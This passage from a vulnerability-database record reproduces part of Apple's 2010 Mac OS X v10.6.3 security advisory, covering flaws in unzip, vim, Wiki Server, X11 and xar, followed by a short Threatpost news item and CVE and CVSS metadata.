unzip\n\ncommand tool may lead to an unexpected application termination or\n\ncode execution\n\nDescription: An uninitialized pointer issue exists is the handling\n\nof zip files. Extracting maliciously crafted zip files using the\n\nunzip command tool may lead to an unexpected application termination\n\nor arbitrary code execution. This issue is addressed by performing\n\nadditional validation of zip files. This issue does not affect Mac OS\n\nX v10.6 systems.\n\nvim\n\nCVE-ID: CVE-2008-2712, CVE-2008-4101, CVE-2009-0316\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: Multiple vulnerabilities in vim 7.0\n\nDescription: Multiple vulnerabilities exist in vim 7.0, the most\n\nserious of which may lead to arbitrary code execution when working\n\nwith maliciously crafted files. These issues are addressed by\n\nupdating to vim 7.2.102. These issues do not affect Mac OS X v10.6\n\nsystems. Further information is available via the vim website at\n\nhttp://www.vim.org/\n\nWiki Server\n\nCVE-ID: CVE-2010-0523\n\nAvailable for: Mac OS X Server v10.5.8\n\nImpact: Uploading a maliciously crafted applet may lead to the\n\ndisclosure of sensitive information\n\nDescription: Wiki Server allows users to upload active content such\n\nas Java applets. A remote attacker may obtain sensitive information\n\nby uploading a maliciously crafted applet and directing a Wiki Server\n\nuser to view it. The issue is addressed by restricting the file types\n\nthat may be uploaded to the Wiki Server. This issue only affects Mac\n\nOS X Server systems, and does not affect versions 10.6 or later.\n\nWiki Server\n\nCVE-ID: CVE-2010-0534\n\nAvailable for: Mac OS X v10.6 through v10.6.2,\n\nMac OS X Server v10.6 through v10.6.2\n\nImpact: An authenticated user may bypass weblog creation\n\nrestrictions\n\nDescription: Wiki Server supports service access control lists\n\n(SACLs), allowing an administrator to control the publication of\n\ncontent. Wiki Server fails to consult the weblog SACL during the\n\ncreation of a user\u2019s weblog. This may allow an authenticated user to\n\npublish content to the Wiki Server, even though publication should be\n\ndisallowed by the service ACL. This issue does not affect systems\n\nprior to Mac OS X v10.6.\n\nX11\n\nCVE-ID: CVE-2009-2042\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Viewing a maliciously crafted image may lead to the\n\ndisclosure of sensitive information\n\nDescription: libpng is updated to version 1.2.37 to address an issue\n\nthat may result in the disclosure of sensitive information. Further\n\ninformation is available via the libpng site at\n\nhttp://www.libpng.org/pub/png/libpng.html\n\nX11\n\nCVE-ID: CVE-2003-0063\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8,\n\nMac OS X v10.6 through v10.6.2, Mac OS X Server v10.6 through v10.6.2\n\nImpact: Displaying maliciously crafted data within an xterm terminal\n\nmay lead to arbitrary code execution\n\nDescription: The xterm program supports a command sequence to change\n\nthe window title, and to print the window title to the terminal. The\n\ninformation returned is provided to the terminal as though it were\n\nkeyboard input from the user. Within an xterm terminal, displaying\n\nmaliciously crafted data containing such sequences may result in\n\ncommand injection. The issue is addressed by disabling the affected\n\ncommand sequence.\n\nxar\n\nCVE-ID: CVE-2010-0055\n\nAvailable for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\n\nImpact: A modified package may appear as validly signed\n\nDescription: A design issue exists in xar when validating a package\n\nsignature. This may allow a modified package to appear as validly\n\nsigned. This issue is fixed through improved package signature\n\nvalidation. This issue does not affect Mac OS X v10.6 systems.\n\nCredit: Apple.\n\nSecurity Update 2010-002 / Mac OS X v10.6.3 may be obtained from\n\nthe Software Update pane in System Preferences, or Apple\u2019s Software\n\nDownloads web site:\n\nhttp://www.apple.com/support/downloads/\n\n[](<https://threatpost.com/apple-mega-patch-covers-88-mac-os-x-vulnerabilities-032910/>)Apple today released one of its biggest Mac OS X security updates in recent memory, covering a whopping 88 documented vulnerabilities.\n\nThe Mac OS X v10.6.3 update, which is considered \u201ccritical,\u201d covers flaws that could lead to remote code execution, information disclosure and denial-of-service attacks.\n\nIn some scenarios, a malicious hacker could take complete control of a Mac-powered machine if a user simply views a malicious image or movie file.\n\nThe update covers critical vulnerabilities in AppKit, QuickTime,CoreMedia, CoreTypes, DiskImages, ImageIO and Image RAW.\n\nIt also covers holes in several open-source components, including Apache, ClamAV, MySQL, PHP.\n\nHere\u2019s [the full list](<http://support.apple.com/kb/HT4077>) of the patched vulnerabilities. \n\nThe Security Update 2010-002 / Mac OS X v10.6.3 may be obtained from the Software Update pane in System Preferences, or [Apple\u2019s Software Downloads](<site:http://www.apple.com/support/downloads/>) web page.\n", "reporter": "Ryan Naraine", "published": "2010-03-29T17:15:44", "type": "threatpost", "title": "Apple Mega Patch Covers 88 Mac OS X Vulnerabilities", "enchantments": {"score": {"modified": "2018-10-06T23:08:12", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2003-0063", "CVE-2006-1329", "CVE-2008-0564", "CVE-2008-0888", "CVE-2008-2712", "CVE-2008-4101", "CVE-2008-4456", "CVE-2008-5302", "CVE-2008-5303", "CVE-2008-5515", "CVE-2008-7247", "CVE-2009-0033", "CVE-2009-0037", "CVE-2009-0316", "CVE-2009-0580", "CVE-2009-0688", "CVE-2009-0689", "CVE-2009-0781", "CVE-2009-0783", "CVE-2009-1904", "CVE-2009-2042", "CVE-2009-2417", "CVE-2009-2422", "CVE-2009-2446", "CVE-2009-2632", "CVE-2009-2693", "CVE-2009-2801", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-2906", "CVE-2009-3009", "CVE-2009-3095", "CVE-2009-3557", "CVE-2009-3558", "CVE-2009-3559", "CVE-2009-4017", "CVE-2009-4019", "CVE-2009-4030", "CVE-2009-4142", "CVE-2009-4143", "CVE-2009-4214", "CVE-2010-0041", "CVE-2010-0042", "CVE-2010-0043", "CVE-2010-0055", "CVE-2010-0056", "CVE-2010-0057", "CVE-2010-0058", "CVE-2010-0059", "CVE-2010-0060", "CVE-2010-0062", "CVE-2010-0063", "CVE-2010-0064", "CVE-2010-0065", "CVE-2010-0393", "CVE-2010-0497", "CVE-2010-0498", "CVE-2010-0500", "CVE-2010-0501", "CVE-2010-0502", "CVE-2010-0503", "CVE-2010-0504", "CVE-2010-0505", "CVE-2010-0506", "CVE-2010-0507", "CVE-2010-0508", "CVE-2010-0509", "CVE-2010-0510", "CVE-2010-0511", "CVE-2010-0512", "CVE-2010-0513", "CVE-2010-0514", "CVE-2010-0515", "CVE-2010-0516", "CVE-2010-0517", "CVE-2010-0518", "CVE-2010-0519", "CVE-2010-0520", "CVE-2010-0521", "CVE-2010-0522", "CVE-2010-0523", "CVE-2010-0524", "CVE-2010-0525", "CVE-2010-0526", "CVE-2010-0533", "CVE-2010-0534", "CVE-2010-0535", "CVE-2010-0537"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:37:25", "id": "THREATPOST:4F867C686B7E31697E158FBD04A5DD35", "href": "https://threatpost.com/apple-mega-patch-covers-88-mac-os-x-vulnerabilities-032910/73753/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
